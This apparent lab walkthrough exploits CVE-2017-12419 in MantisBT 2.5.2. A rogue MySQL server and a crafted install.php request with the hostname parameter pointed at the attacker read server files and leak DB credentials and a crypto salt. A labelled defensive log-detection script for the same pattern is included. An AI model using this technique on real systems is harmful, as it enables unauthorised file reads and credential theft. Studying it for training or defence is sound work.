Arbitrary File Read


The target MantisBT instance appears likely to be vulnerable to CVE-2017-12419.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec/Rogue-MySql-Server]
└─$ php roguemysql.php
Enter filename to get [/etc/passwd] > 
[.] Waiting for connection on 0.0.0.0:3306

Setting up the rogue MySQL server

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ curl -s "http://$IP/bugtracker/admin/install.php?install=3&hostname=$tun0"

Invoking the DB installation

Arbitrary file read confirmed
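From the defender's side, the step above leaves a distinctive trace in the web server log: a request to admin/install.php whose hostname parameter points the DB connection at a host other than the configured database server. The following detection is an added example, not part of the original writeup or of MantisBT; the log lines and the allowed-host set are constructed for the example.

```python
# Added example (not from the original writeup): flag access-log entries that match
# the MantisBT admin/install.php abuse pattern, i.e. install step 3 with a "hostname"
# parameter that is not the configured database server. Log lines are constructed.
import re
from urllib.parse import urlparse, parse_qs

# Hosts the application may legitimately use as its DB server (assumption for this
# example; in practice take the value of $g_hostname from config_inc.php).
ALLOWED_DB_HOSTS = {"localhost", "127.0.0.1"}

# Apache/nginx "combined"-style log line: client, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_install_requests(lines):
    """Return (client, hostname_param, target) for every request that reaches
    admin/install.php with a DB hostname outside ALLOWED_DB_HOSTS."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        if not url.path.endswith("/admin/install.php"):
            continue
        qs = parse_qs(url.query)
        # The hostname parameter overrides $g_hostname for the installer's DB connection;
        # any value that is not the real DB server is the pattern seen in this writeup.
        for host in qs.get("hostname", []):
            if host.lower() not in ALLOWED_DB_HOSTS:
                hits.append((m.group("client"), host, m.group("target")))
    return hits


SAMPLE_LOG = [  # constructed sample lines; 192.0.2.10 is a documentation-range address
    '10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /bugtracker/view_all_bug_page.php HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Oct/2023:12:00:07 +0000] "GET /bugtracker/admin/install.php?install=3&hostname=192.0.2.10 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [10/Oct/2023:12:00:09 +0000] "GET /bugtracker/admin/install.php?install=3&hostname=localhost HTTP/1.1" 200 2048',
    '10.0.0.9 - - [10/Oct/2023:12:00:12 +0000] "GET /bugtracker/admin/install.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, host, target in suspicious_install_requests(SAMPLE_LOG):
        print(f"ALERT {client} pointed install.php at DB host {host}: {target}")
```

On a finished installation the admin/ directory should not be reachable at all, so any hit on install.php after deployment is worth alerting on regardless of the parameters.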

Version Information


Enter filename to get [/var/www/html/bugtracker/config/config_inc.php] > /var/www/html/bugtracker/core/constant_inc.php
[.] Waiting for connection on 0.0.0.0:3306
[+] Connection from 192.168.135.204:39534 - greet... auth ok... some shit ok... want file... 
[+] /var/www/html/bugtracker/core/constant_inc.php from 192.168.135.204:39534:
<?php
/**
 * MantisBT Constants
 *
 */
 
/**
 * Mantis Version
 */
define( 'MANTIS_VERSION', '2.5.2' );
define( 'FILTER_VERSION', 'v9' );
 
[...REDACTED...]

The /var/www/html/bugtracker/core/constant_inc.php file leaks the version information: Mantis Bug Tracker 2.5.2.

Configuration File


  • During the web enumeration, the web root directory was leaked: /var/www/html/bugtracker
  • Additionally, it was revealed that attempting to install the MantisBT instance with the default DB credentials led to the configuration file being updated: config/config_inc.php
Enter filename to get [/etc/passwd] > /var/www/html/bugtracker/config/config_inc.php       
[.] Waiting for connection on 0.0.0.0:3306
[+] Connection from 192.168.135.204:39526 - greet... auth ok... some shit ok... want file... 
[+] /var/www/html/bugtracker/config/config_inc.php from 192.168.135.204:39526:
<?php
$g_hostname               = 'localhost';
$g_db_type                = 'mysqli';
$g_database_name          = 'bugtracker';
$g_db_username            = 'root';
$g_db_password            = 'SuperSequelPassword';
 
$g_default_timezone       = 'UTC';
 
$g_crypto_master_salt     = 'OYAxsrYFCI+xsFw3FNKSoBDoJX4OG5aLrp7rVmOCFjU=';

There is the DB credential: root:SuperSequelPassword. Validation will be made against the target MySQL instance.